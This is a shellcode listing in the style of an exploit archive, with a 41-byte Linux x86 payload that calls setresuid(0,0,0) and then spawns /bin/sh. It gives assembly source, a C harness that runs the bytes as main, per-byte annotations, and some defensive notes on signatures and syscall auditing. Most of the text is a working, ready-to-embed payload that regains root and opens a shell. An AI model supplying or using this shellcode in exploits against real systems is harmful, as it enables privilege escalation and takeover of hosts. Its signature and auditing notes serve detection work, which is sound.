Linux/x86 - setresuid(0,0,0) + execve(/bin/sh) + exit() Shellcode (41 bytes)
2009-01-01 12:05:09
/* linux x86 shellcode(41 bytes) by sacrine of Netric (www.netric.org)
* setresuid(0,0,0); execve /bin/sh; exit;
*
__asm(" xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
cdq
movb $0xa4, %al
int $0x80
xorl %eax,%eax
push %eax
pushl $0x68732f2f
pushl $0x6e69622f
mov %esp, %ebx
push %eax
push %ebx
lea (%esp,1),%ecx
movb $0xb, %al
int $0x80
xorl %eax,%eax
mov $0x1, %al
int $0x80
");
*/
// Test harness for the 41-byte i386 Linux payload described in the header.
// The opcode bytes are stored in a char array that is itself named main, so
// the startup code's call to main lands on this data instead of compiled code.
// NOTE(review): where data pages are non-executable (NX / W^X) the array
// presumably sits in a non-executable section and the call faults rather than
// running -- confirm against the build and target configuration.
//
// Defensive notes:
//  - The two push immediates place the constant string "/bin//sh" on the
//    stack; the byte run 68 2f 2f 73 68 68 2f 62 69 6e does not depend on load
//    address, so it can be matched as a static signature in captured
//    traffic or memory.
//  - At runtime the sequence is setresuid(0,0,0) followed directly by an
//    execve of a shell, a pairing that syscall auditing can flag.
//  - The setresuid call only succeeds if the hosting process already has the
//    privilege to change its UIDs; dropping privileges early removes that.
char main[]=
// setresuid(0,0,0);  all three arguments are zeroed registers
"\x31\xc0" // xor %eax,%eax        eax = 0
"\x31\xdb" // xor %ebx,%ebx        ebx = 0 (first argument)
"\x31\xc9" // xor %ecx,%ecx        ecx = 0 (second argument)
"\x99" // cdq                      sign-extends eax (0) into edx: edx = 0 (third argument)
"\xb0\xa4" // mov $0xa4, %al       syscall number 0xa4 (setresuid on i386)
"\xcd\x80" // int $0x80            result in eax is not checked; it is wiped by the next xor
// execve /bin/sh  (ebx = path, ecx = argv, edx still 0 from the cdq above)
"\x31\xc0" // xor %eax,%eax        eax = 0, used below as the NUL / NULL source
"\x50" // push %eax                four zero bytes: terminates the path string
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f   bytes "//sh" (doubled slash pads to 4 bytes)
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f   bytes "/bin"; stack now reads "/bin//sh\0"
"\x89\xe3" // mov %esp,%ebx        ebx = address of the path string
"\x50" // push %eax                argv[1] = NULL
"\x53" // push %ebx                argv[0] = path pointer
"\x8d\x0c\x24" // lea (%esp,1),%ecx   ecx = address of the argv array just built
"\xb0\x0b" // mov $0xb,%al         syscall number 0xb (execve)
"\xcd\x80" // int $0x80
// exit  (only reached if the execve above returns, i.e. failed)
"\x31\xc0" // xorl %eax,%eax       clear the error code left in eax
"\xb0\x01" // movb $0x1, %al       syscall number 1 (exit)
"\xcd\x80"; // int $0x80           ebx is not reloaded, so the status is whatever ebx holds

